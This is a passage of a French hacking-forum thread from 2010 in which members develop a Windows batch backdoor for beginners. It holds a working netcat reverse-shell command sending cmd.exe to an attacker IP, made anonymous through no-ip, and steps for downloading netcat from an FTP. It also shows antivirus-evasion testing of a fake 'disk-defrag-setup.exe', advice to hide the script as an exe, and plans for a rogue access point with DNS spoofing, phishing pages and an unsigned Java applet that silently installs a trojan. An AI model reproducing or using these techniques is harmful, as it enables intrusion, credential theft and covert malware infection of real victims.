Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 27-04-2010 12:57:31

Cr@Sh
Membre d'honneur
Inscription : 23-09-2009
Messages : 380

Re : Backdoor pour Noobz sous win

merci Veidam pour ton poste, and have fun

il y a aussi "wget.exe"

wget http://whatismyip.org/

la commande retourne un fichier index.html avec l'ip dedans mais wget à pas mal d'option que download.exe n'a pas, par contre il fait 312ko donc à vous de voir si vous avez besoin de toute les option de wget ou juste de récup l'ip public

wget --help
GNU Wget 1.11.4, a non-interactive network retriever.
Usage: wget [OPTION]... [url]...

Mandatory arguments to long options are mandatory for short options too.

Startup:
  -V,  --version           display the version of Wget and exit.
  -h,  --help              print this help.
  -b,  --background        go to background after startup.
  -e,  --execute=COMMAND   execute a `.wgetrc'-style command.

Logging and input file:
  -o,  --output-file=FILE    log messages to FILE.
  -a,  --append-output=FILE  append messages to FILE.
  -d,  --debug               print lots of debugging information.
  -q,  --quiet               quiet (no output).
  -v,  --verbose             be verbose (this is the default).
  -nv, --no-verbose          turn off verboseness, without being quiet.
  -i,  --input-file=FILE     download URLs found in FILE.
  -F,  --force-html          treat input file as HTML.
  -B,  --base=URL            prepends URL to relative links in -F -i file.

Download:
  -t,  --tries=NUMBER            set number of retries to NUMBER (0 unlimits).
       --retry-connrefused       retry even if connection is refused.
  -O,  --output-document=FILE    write documents to FILE.
  -nc, --no-clobber              skip downloads that would download to
                                 existing files.
  -c,  --continue                resume getting a partially-downloaded file.
       --progress=TYPE           select progress gauge type.
  -N,  --timestamping            don't re-retrieve files unless newer than
                                 local.
  -S,  --server-response         print server response.
       --spider                  don't download anything.
  -T,  --timeout=SECONDS         set all timeout values to SECONDS.
       --dns-timeout=SECS        set the DNS lookup timeout to SECS.
       --connect-timeout=SECS    set the connect timeout to SECS.
       --read-timeout=SECS       set the read timeout to SECS.
  -w,  --wait=SECONDS            wait SECONDS between retrievals.
       --waitretry=SECONDS       wait 1..SECONDS between retries of a retrieval.
       --random-wait             wait from 0...2*WAIT secs between retrievals.
       --no-proxy                explicitly turn off proxy.
  -Q,  --quota=NUMBER            set retrieval quota to NUMBER.
       --bind-address=ADDRESS    bind to ADDRESS (hostname or IP) on local host.
       --limit-rate=RATE         limit download rate to RATE.
       --no-dns-cache            disable caching DNS lookups.
       --restrict-file-names=OS  restrict chars in file names to ones OS allows.
       --ignore-case             ignore case when matching files/directories.
       --user=USER               set both ftp and http user to USER.
       --password=PASS           set both ftp and http password to PASS.

Directories:
  -nd, --no-directories           don't create directories.
  -x,  --force-directories        force creation of directories.
  -nH, --no-host-directories      don't create host directories.
       --protocol-directories     use protocol name in directories.
  -P,  --directory-prefix=PREFIX  save files to PREFIX/...
       --cut-dirs=NUMBER          ignore NUMBER remote directory components.

HTTP options:
       --http-user=USER        set http user to USER.
       --http-password=PASS    set http password to PASS.
       --no-cache              disallow server-cached data.
  -E,  --html-extension        save HTML documents with `.html' extension.
       --ignore-length         ignore `Content-Length' header field.
       --header=STRING         insert STRING among the headers.
       --max-redirect          maximum redirections allowed per page.
       --proxy-user=USER       set USER as proxy username.
       --proxy-password=PASS   set PASS as proxy password.
       --referer=URL           include `Referer: URL' header in HTTP request.
       --save-headers          save the HTTP headers to file.
  -U,  --user-agent=AGENT      identify as AGENT instead of Wget/VERSION.
       --no-http-keep-alive    disable HTTP keep-alive (persistent connections).
       --no-cookies            don't use cookies.
       --load-cookies=FILE     load cookies from FILE before session.
       --save-cookies=FILE     save cookies to FILE after session.
       --keep-session-cookies  load and save session (non-permanent) cookies.
       --post-data=STRING      use the POST method; send STRING as the data.
       --post-file=FILE        use the POST method; send contents of FILE.
       --content-disposition   honor the Content-Disposition header when
                               choosing local file names (EXPERIMENTAL).
       --auth-no-challenge     Send Basic HTTP authentication information
                               without first waiting for the server's
                               challenge.

HTTPS (SSL/TLS) options:
       --secure-protocol=PR     choose secure protocol, one of auto, SSLv2,
                                SSLv3, and TLSv1.
       --no-check-certificate   don't validate the server's certificate.
       --certificate=FILE       client certificate file.
       --certificate-type=TYPE  client certificate type, PEM or DER.
       --private-key=FILE       private key file.
       --private-key-type=TYPE  private key type, PEM or DER.
       --ca-certificate=FILE    file with the bundle of CA's.
       --ca-directory=DIR       directory where hash list of CA's is stored.
       --random-file=FILE       file with random data for seeding the SSL PRNG.
       --egd-file=FILE          file naming the EGD socket with random data.

FTP options:
       --ftp-user=USER         set ftp user to USER.
       --ftp-password=PASS     set ftp password to PASS.
       --no-remove-listing     don't remove `.listing' files.
       --no-glob               turn off FTP file name globbing.
       --no-passive-ftp        disable the "passive" transfer mode.
       --retr-symlinks         when recursing, get linked-to files (not dir).
       --preserve-permissions  preserve remote file permissions.

Recursive download:
  -r,  --recursive          specify recursive download.
  -l,  --level=NUMBER       maximum recursion depth (inf or 0 for infinite).
       --delete-after       delete files locally after downloading them.
  -k,  --convert-links      make links in downloaded HTML point to local files.
  -K,  --backup-converted   before converting file X, back up as X.orig.
  -m,  --mirror             shortcut for -N -r -l inf --no-remove-listing.
  -p,  --page-requisites    get all images, etc. needed to display HTML page.
       --strict-comments    turn on strict (SGML) handling of HTML comments.

Recursive accept/reject:
  -A,  --accept=LIST               comma-separated list of accepted extensions.
  -R,  --reject=LIST               comma-separated list of rejected extensions.
  -D,  --domains=LIST              comma-separated list of accepted domains.
       --exclude-domains=LIST      comma-separated list of rejected domains.
       --follow-ftp                follow FTP links from HTML documents.
       --follow-tags=LIST          comma-separated list of followed HTML tags.
       --ignore-tags=LIST          comma-separated list of ignored HTML tags.
  -H,  --span-hosts                go to foreign hosts when recursive.
  -L,  --relative                  follow relative links only.
  -I,  --include-directories=LIST  list of allowed directories.
  -X,  --exclude-directories=LIST  list of excluded directories.
  -np, --no-parent                 don't ascend to the parent directory.

Mail bug reports and suggestions to <bug-wget@gnu.org>.

voici le lien pour wget.exe

bon on a remarqué que wget pouvait servir à autre chose que de la récupération d'ip, couplez le à un script et soyez créatif


crsh.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 27-04-2010 19:39:21

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

cool wget.exe un peu lourd c vraie mais il a des options sympa a regarder smile

j'en profite pour te poser une question

quelle différence entre cette commande

del l33t-* /a

et

del l33t-*

Hors Ligne

#28 27-04-2010 21:34:09

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

File Info

Report date: 2010-04-27 22:17:27 (GMT 1)
File name: disk-defrag-setup.exe
File size: 2782720 bytes
MD5 Hash: 443e3634a998ecfc335fbfc358fc3af9
SHA1 Hash: e4b731ec76bf8e7bdd20648af14b2fdc8e2be8bd
Detection rate: 4 on 20 (20%)
Status: INFECTED

Detections

a-squared - -
Avast - -
AVG - HackTool.GWO.dropper
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - not-a-virus:PSWTool.Win32.MailPassView.el
McAfee - -
NOD32 - multiple threats
Panda - -
Solo - -
TrendMicro - Suspicious
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

voici un test  4/20 kapersky toujour là smile
sinon antivir je pensais pas qu'il se ferais avoir hmm

Hors Ligne

#29 27-04-2010 22:58:14

Cr@Sh
Membre d'honneur
Inscription : 23-09-2009
Messages : 380

Re : Backdoor pour Noobz sous win

je te dis rien mais fais l'expérience, essayes de del un fichier "L33t-" en +H+S avec "del l33t-*", puis fais le avec "del l33t-* /a".

Aller hop ! On met sa blouse blanche, sa règle millimétrée, son petit stylo et on fait soi même les tests wink


crsh.jpg

Hors Ligne

#30 27-04-2010 23:24:35

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

c cool de m'aider vraiment j'ai saisie merci

finalement c ici que bb as fait un pas et grâce a toi 20

sinon Bat_To_Exe_Converter colle bien mais

reste plus qu'a savoir se servir de ollydbg.exe pour le modifier je reviens dans deux siècle vous en causer big_smile

Hors Ligne

#31 28-04-2010 20:52:27

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

je viens d'avoir un flash (c le cas de le dire) pour gonfler le code tenter de prendre une image de la victime seul bémol la led va s'allumer c sur !

voici la source de départ http://www.e-cerveau.com/flashcam/ et http://jeanphiblog.media-box.net/dotcle … pdata2jpeg
avec du JavaScript et de bon tool comme mouse sur cette page http://www.f2ko.de/English/cmdtools/index.php cela est a étudier je vais tenter cette voie si vous avez envie de m'aider ne vous gêner pas big_smile

sinon je vous tiens au courant pour le partage...

Hors Ligne

#32 04-05-2010 20:38:33

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

c encore moi ici big_smile

bien pour le flash je vous tiens au courant mais je pense faire cela lors de longue vacance... mais je vous ferais part de mes recherches comme promis

bien je viens ce soir pour une questions sur netcat avant de faire le test par moi même car manque de temps par rapport a mon envie de savoir si cela est ok ou du moins peut l'être

voici la classe de travaux :

comme on le sait pour ceux qui ce donne la peine de tester et de se renseigner nos boxe refuse les connexions entrante mais authorise les connexions sortante...

donc lors de mes testes la commande du code

nc -l -p 4444

(dalleurs comme tu le vois crash jai rectifier mon erreur)

ne fonctionne pas car il faut utiliser un reverse shell [img align=D]http://www.aldeid.com/images/thumb/7/75/Reverse-shell.png/450px-Reverse-shell.png[/img]

donc la commande du code sera d'utiliser celle-ci cela marche

nc XX.XX.XX.XX 4444 -e cmd.exe

je l'ai tester c bon

le seul bémol c'est de mettre son ip dans le script sad  enfin je cherche dons une solution d'où mon poste

disons que si j'utilise un proxy auquel je l'associe a un logiciel comme noip.com necat va t'il pouvoir avoir une option pour ce genre de service le gerera t'il ?

sinon si vous avez une voie pour faire cela donnez moi juste un indice pour la recherche

voila si no réponse je ferais de toutes façon des testes dans cette optique et vous rendrez compte des résultats !

merci

Hors Ligne

#33 18-05-2010 22:21:40

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

re et bien no ip fonctionne a merveille même avec un proxy donc c good pour un reverse shell with netcat en "anonymat"

mais ceci je l'ai tester sur mon matos je précise smile

Hors Ligne

#34 29-05-2010 22:50:17

nessbeal
Nouveau membre
Inscription : 26-05-2010
Messages : 8

Re : Backdoor pour Noobz sous win

wahou g riennnnn compris....comment donner vie a ses srcipt?

Hors Ligne

#35 29-05-2010 23:24:30

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

euh il faut juste prendre le temps

d'apprendre le batch et de suivre le tuto de cr@sh l'un des meilleurs de crack-wpa si tu as des questions précise alors pose les on est là pour s'amuser et comprendre nous sommes tous des débutants

on se prends pas pour ce que l'on est pas ici c pour ça que j'aime trainer ici

wink

pour le batch voir ici ou et encore mieux ici

Dernière modification par Veidam (29-05-2010 23:49:57)

Hors Ligne

#36 15-06-2010 17:18:19

Cr@Sh
Membre d'honneur
Inscription : 23-09-2009
Messages : 380

Re : Backdoor pour Noobz sous win

Salut Veidam,

- dans ton post du 13-06-2010
"...1er étape: créer un compte no-ip et utiliser un compte free-wifi (pourquoi ben c mieux sisi wink )..."
-> quand il y a pas de Freebox, il y a pas de compte free-wifi

" download.exe http://votreftp/system.exe --- download.exe http://votreftp/ex.exe " donc netcat doit être télécharger pour faire un reverse shell
-> Pose toi la question "Qu'est ce qui pourrait faire rater mon attaque ? "
-> Réponse "Qu'il y ai une connexion réseau uniquement". Donc pas de net, pas de ftp, pas de download netcat (à vouloir alléger de la mauvaise façon tu risques de rien avoir)

- En ce qui concerne la question de l'ip, à ton avis nmap sert quoi ? Tu scan et tu repères l'ip avec le port en écoute que tu as définis par netcat  (ex:4444)

- netstat te donne l'ip :
netstat -r ou route print est pas mal (tu as la liste des interfaces, leur mac adresse / la table de routage, donc les ip / la passerelle)

- je t'ai pas tout dit mais je vais pas non plus te mâcher le boulot

te faire un "no-ip", pquoi pas y'a du pour et du contre (mais ça te coute rien de l'ajouter en prenant compte qu'il puisse y avoir que du réseau, donc le web pas accessible)
n'oublies pas que te peux te faire transférer les infos directement


crsh.jpg

Hors Ligne

#37 15-06-2010 19:56:29

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

Salut

pour le free wifi ça marche mieux que ma freebox et pour l'anonymat c mieux aussi

mais attention avant de continuer il faut que je te dise je ne suis pas un powneur de world donc je cible une machine je fais du social engineering avant et je crée le prog en fonction de son os et de sont AV

mais j'aime apprendre, et je ne lance pas sur le net n'importe quoi pour récupérer des passes a quoi bon ??

non je teste en local

ou pour ceux qui pourrait s'en prendre a mon intégrité moral ou physique (j'ai ciblé)

sinon j'avoue que le fait de downloader c pas top mais bon c une idée

pour no-ip je suis pas en réseau local donc si je met la passerelle par défaut et l'ip du pc cible ça sera pas bon
.. peut tu m'en dire plus sur ça ?

netstat -r je connaisser pas on peut peut être infecter des machines sur le réseau avec du vbs et netcat ça dois pouvoir ce faire ...

j'utilise bifrost aussi en plus de netcat

c vraie que je cherche un bon compromis pour un prog genre un guy pour netcat qui pourras recevoir plusieurs reverse/shell comme bifrost mais là c pas pour dessuite mais ....

voila je ne fais rien de sérieux mais si il le fallait et grâce a toi et ton tuto je pourrais faire surement un truc balèze un jour et en pourquoi pas c++ ou python enfin apprendre toujours plus appliquer pour valider je le fait comme netcat et bifrost et aprés on repart aux charbon jamais s'auto-satisfaire de ce que l'on sait c ma devise

Dernière modification par Veidam (15-06-2010 19:59:39)

Hors Ligne

#38 16-06-2010 09:21:44

Cr@Sh
Membre d'honneur
Inscription : 23-09-2009
Messages : 380

Re : Backdoor pour Noobz sous win

Je me suis peut être mal exprimé, ou tu m'as mal compris, mais visiblement mon post a mal été interprété...Bref on s'en fou. On reprend les mêmes et on recommence.

La question n'est pas sur ta motivation ou tes intentions, la question est sur la mise en situation (notamment comment te mettre en défaut).

En gros par rapport à ce que tu as fait je te mets volontairement des bâtons dans les roues d'ou la ligne (Pose toi la question "Qu'est ce qui pourrait faire rater mon attaque ? "), et à toi de faire le nécessaire pour rectifier le tir.

Je m'explique :
                   
      - Je me trompe peut être mais pour avoir un compte "Free Wifi" il faut être possesseur d'une Freebox... non ? N'oublies pas            que, ce que tu fais, doit être repris par tous le monde donc par ceux qui n'ont pas de Freebox.

      - Sur le point du download de netcat, comme tu le dis dans ton post "...c'est une idée...". Mais rappel toi le principe du projet          (pour mémo : ça doit voler des infos et créer un reverse shell), pour le c'est tout bon, pour le comment tu fais           quand il y juste un réseau basique et pas d'accès au net, conclusion pas de téléchargement de netcat, donc pas de reverse           shell (si le but était juste d'alléger le prog, retire les octets sur autre chose).

      - Les ip, bon j'ai cru comprendre que ton souci était de trouver l'ip victime pour pouvoir s'y connecter dessus, je me répète,            nmap est là pour ça.

      - Si le réseau permet l'accès au web, tu pourra récup toute ces infos sur ton ftp, et netstat dans ton bat donnera l'ip, ex :               netstat -r   te fournira pas mal d'info (la liste des interfaces, leur mac adresse / la table de routage, donc les ip / la                      passerelle). Avec moins de détail tu as aussi la commande ipconfig /all qui se trouve déjà dans le script

Donc là on a 2 façon relativement très simple de récupérer l'ip, bien entendu il y en à d'autre (ton script peut très bien lui faire dire "...coucou je suis sur le réseau et mon ip est 192.168.1.X, viens me chercher...")

      - Le dernier point était sur le fait que ce tool devait fonctionner en toute circonstance, web ou pas, donc rapatriement des                infos d'une façon (ftp) ou d'une autre... Là c'est facile, tu sauras trouver par toi même.

Le code est une ébauche très généraliste, à vous d'en faire quelque chose de plus personnel, (tu parles de  social engineering, pquoi pas faire tourner un server avec page piégée de ton coté, redirection, etc...)
Bref... Les seules limites, sont celle de votre imagination.


crsh.jpg

Hors Ligne

#39 16-06-2010 18:07:06

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

Cr@Sh a écrit :

Je me suis peut être mal exprimé, ou tu m'as mal compris, mais visiblement mon post a mal été interprété...Bref on s'en fou. On reprend les mêmes et on recommence.

La question n'est pas sur ta motivation ou tes intentions, la question est sur la mise en situation (notamment comment te mettre en défaut)

oui ne m'en veut pas j'ai été lourd là

je vais essayer de pondre un truc sympa je bosse sur une page web en vbs et java pour l'instant il est détecté par les antivirus mais .... wink

j'ai compris le principe ne pas avoir besoin d'internet pour la bonne marche et se mettre en défaut pour que ça marche je viens partager dés que c fait

Hors Ligne

#40 18-06-2010 10:09:08

Cr@Sh
Membre d'honneur
Inscription : 23-09-2009
Messages : 380

Re : Backdoor pour Noobz sous win

mea-culpa, j'ai relu tes posts

j'ai focalisé sur l'ip local donc erreur de ma part, toi tu recherches l'IP PUBLIQUE

par contre:
+1 pour cryptcat
+1 pour bat to exe (pour avoir le script bat en exe, c'est toujours mieux de cacher ses intentions)

petit bonus sur les tools, par contre les versions sont pas à jour

voici aussi les tools de sysinternals


crsh.jpg

Hors Ligne

#41 18-06-2010 11:55:42

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Backdoor pour Noobz sous win

+1 pour cryptcat

Par contre je vois pas bien l'utilité d'utiliser Bat to Exe ...


Sharkoff

Hors Ligne

#42 18-06-2010 11:56:43

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

hello

oui on ne s' étais pas compris ... je travail sur un gros truc bien cool et j'ai avancé comme si j'avais mis des bottes de sept lieux grâce a ton tuto !!!

mais en local il y a un truc que j'ai fait qui pourras surement aboutir

voici le truc on lance airodump et on recherche une station en wpa on voit dans certain cas que la carte wifi utilise plusieurs réseaux (en plus de celui qui est connecter) genre un free wifi ce qui compte c que ce soit un réseau qui n'est pas besoin de clé mais d'un portail web pour s'authentifier et là c top car il suffit de crasher la box en wpa de créer une rogue et un spoof dns sur son serveur privé

c là ou ce que je viens d'apprendre et qui fonctionne prend tous son charme car il suffit d'un applet java et d'un code vbs pour installer et exécuter notre petit trojan made in crack wpa sans que l'utilisateur ne voie rien juste un petit applet (non signé bien sur ) wireleskeyview en action !!!

mais tout est a l'état brut je compte bien partager tous ceci code et cryptage et plus mais je dois créer les pages web (phishing et tester le tous pour ne pa avoir l'air d'un trublion qui veut se la jouer je dois maitriser mon sujet avant tous c sur la bonne voie car j'ai encore réussi a powned les antivirus et l'execution du trojan se fait au top

voila j'aimerais que l'on soit plus a s'intéresser a ceci mais je ne veut pas non plus aider ceux qui ont de mauvaise intention donc on va voir ça pendant les vacances d'été

sinon merci pour tes liens ils sont comme tous ce que tu nous offre depuis ton arrivé ici très INTERESSANT

edit : bat to exe converters permet de compiler un fichier bat de lui inclure d'autre tools et de changer l'icone de mettre des informations de versions et de compiler le tous en exe un seul que l'on ne peut pas ouvrir aussi simplement qu'une archive sfx donc c plus dicret ça evite de se servir de res hack aussi

Dernière modification par Veidam (18-06-2010 12:01:50)

Hors Ligne

#43 18-06-2010 12:09:06

Cr@Sh
Membre d'honneur
Inscription : 23-09-2009
Messages : 380

Re : Backdoor pour Noobz sous win

Cr@Sh a écrit :

"...(tu parles de  social engineering, pquoi pas faire tourner un server avec page piégée de ton coté, redirection, etc...)..."

ahhh quand même l'idée à fait son chemin, je suis impatient de voir ce que ça va donner via l'applet java
(du coté furtif tu vas peut être avoir une surprise, selon comment tu t'y prendra)... y'a un piège wink

bon test


crsh.jpg

Hors Ligne

#44 18-06-2010 12:53:01

faptiem
Membre Indéboulonnable
Inscription : 29-04-2010
Messages : 127

Re : Backdoor pour Noobz sous win

Ce serait possible qu'on parle de tout ça dans une partie privée ?
Déplacer ce genre de "travaux" dans une partie réservée à certains membres ?
En effet je pense que laisser ça ouvert à un quelconque visiteur est un peu léger.

Désolé du "hors-sujet" mais je pense qu'on peut être assez productif une fois nos moyens mis en commun.
D'ailleurs une fois mes "examens" terminés je viendrais apporter ma pierre à l'édifice concernant cet "angle d'attaque".

Hors Ligne

#45 18-06-2010 12:57:41

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Backdoor pour Noobz sous win

Si ca se fait, ca m'intéresserais vraiment d'en faire partie

Au passage je pourrais coder quelques tools wink

Dernière modification par Squaks (18-06-2010 12:58:46)


Sharkoff

Hors Ligne

#46 18-06-2010 16:48:58

Cr@Sh
Membre d'honneur
Inscription : 23-09-2009
Messages : 380

Re : Backdoor pour Noobz sous win

faptiem voici un peu de lecture: rappel

Squaks tous les tools et codes sont les bienvenues

[edit:] aller ! Faites moi rêver, j'aimerai voir une attaque complète de A à Z,
pour les malins qui me sortiraient "...je branche la clé usb et le tour est joué...", on part du principe qu'il n'y a pas d'accès physique.
Je rajouterai au fur et à mesure des difficultés, et énoncerai des mises en situations différentes.

Veidam sur l'idée tu es bien parti


crsh.jpg

Hors Ligne

#47 18-06-2010 17:24:24

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : Backdoor pour Noobz sous win

Je n'ai pas posté sur ce post mais je le suis de très près. C'est très intéressant sachant que je m'y connais un peu.
Quand j'aurais fini de coder un site, je m'attaquerais à metasploit car les trojans je sais à peu pres comment sa marche.

Hors Ligne

#48 18-06-2010 18:37:03

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

rien n'empêche de créer son payloaad en python ou vbs et de le convertir en exe

on auras donc une reverse shel sur metasploit mais je préfere pour l'instant rester sur netcat mais metasploit j'y suis passer et pour l'instant je maitrise pas du tout mais je retenterai car le potentiel de l'outil m'intéresse smile

Cr@Sh a écrit :

[edit:] aller ! Faites moi rêver, j'aimerai voir une attaque complète de A à Z,
pour les malins qui me sortiraient "...je branche la clé usb et le tour est joué...", on part du principe qu'il n'y a pas d'accès physique.
Je rajouterai au fur et à mesure des difficultés, et énoncerai des mises en situations différentes.

avant la fin du weekend je vais mettre en place un petit aperçu de mes travaux sur l'applet java
bien sur vous pourrez me faire confiance ou pas et l'exécuter cela ouvrira une message box sur votre pc ce qui voudra dire que cela a fonctionner

le code et le liens seront soumis a modération avant de le mettre ici et vous saurez si m1ck3y vous assure que vous ne risquez rien il le testera avant vous pour ça 

vous allez suivre mes testes en direct car je ne suis pas sur d'y parvenir (plusieur paramétres ne sont pas encore tester) j'ai dans l'idée de vous utiliser comme cobaye ceux qui me ferons confiance et qui activerons l'applet en serons quitte pour voir le bloc note de leurs windows s'ouvrir (je l'ai réussi plusieurs fois sans faire sonner avast 5 sur xp sp2 non mis a jours mais avec internet explorer 8) donc affaire a suivre 

je contaterais M1ck3y et Crash d'ici peu pour qu'il approuve le lien et le faite que tout est clean et que c seulement pour le fun et le partage vous aurez juste a de me dire si cela fonctionne ou pas sur vos os seven vista et xp ... si vous avez confiance wink

Hors Ligne

#49 18-06-2010 22:33:04

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : Backdoor pour Noobz sous win

Pour créer le payload en python ou vbs, faut quand meme baleze ^^
Ouai je trouve que Metasploit a un énorme potentiel.

D'accord pour ton applet. Je veux bien. Et dans tout les cas pour ce qui n'ont pas confiance, les machines virtuelles existent ^^

Hors Ligne

#50 19-06-2010 00:07:54

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

voici un pdf en rapport http://www.security-labs.org/fred/docs/trojan-java.pdf

bah t'as raison si y a pas de réaction je lancerais le liens et puis celui qui craint il utiliseras un virtualbox

enfin c pas sur qu 'il y ai a craindre les mises a jour de crosoft pourrait avoir patcher le truc mais bon c pas sur je continue mes testes

sinon si Crash tu préfère voir le code avant je te l'envoie no soucis smile

faites moi signe

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 106 13-03-2017 08:02:40 par nnrs1
7 256 10-03-2017 10:31:53 par aston76
2 379 07-03-2017 17:05:25 par Fab955
2 201 04-03-2017 14:39:28 par GreyBird
5 450 30-01-2017 15:05:34 par flatounet

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.047 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]